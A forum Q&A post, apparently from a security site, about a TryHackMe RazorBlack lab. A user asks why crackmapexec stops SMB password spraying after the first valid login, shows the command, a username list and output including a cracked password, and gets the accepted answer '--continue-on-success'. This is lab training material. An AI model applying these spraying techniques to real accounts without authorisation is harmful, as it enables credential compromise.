# crackmapexec continue after finding first match

Tags: passwords, password-cracking

I am currently trying to solve the RazorBlack room on tryhackme. After enumerating the machine, I created a list of valid usernames and was also able to crack the password of one of the users. Now I want to check if one of the users is using the same password. For this I executed the following command:

```
crackmapexec smb $IP -u validusers/users.txt -p $pass
```

However, crackmapexec terminates as soon as it finds the first match and does not check the rest of the list.
Is there an option that crackmapexec can use to check the entire list?

---

Edit:
My Userlist

```
Administrator
Guest
krbtgt
HAVEN-DC$
xyan1d3
dport
iroyce
tvidal
aedwards
cingram
ncassidy
rzaydan
twilliams
lvetrova
rdelgado
sbradley
clin
```

Crackmapexec output:

```
SMB         10.10.40.74     445    HAVEN-DC         [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\Administrator:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\Guest:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\krbtgt:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\HAVEN-DC$:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\xyan1d3:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\dport:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\iroyce:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\tvidal:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\aedwards:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\cingram:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\ncassidy:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\rzaydan:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [+] raz0rblack.thm\twilliams:roastpotatoes
```

As can be seen above crackmapexec doesn't continue with users

```
lvetrova
rdelgado
sbradley
clin
```

When I remove twilliams from the list and ran the command again:

```
SMB         10.10.40.74     445    HAVEN-DC         [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\Administrator:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\Guest:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\krbtgt:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\HAVEN-DC$:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\xyan1d3:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\dport:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\iroyce:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\tvidal:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\aedwards:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\cingram:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\ncassidy:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\rzaydan:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\rdelgado:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.40.74     445    HAVEN-DC         [-] raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE
```

And again.... crackmapexec didn't scan user "clin"

Comment: did you try `-p ~/file_containing_passwords`

Comment: @schroeder didn't work for me :/

Answer (score 0, accepted):

The answer is adding [`--continue-on-success`](https://mpgn.gitbook.io/crackmapexec/getting-started/using-credentials#password-spraying-without-bruteforce)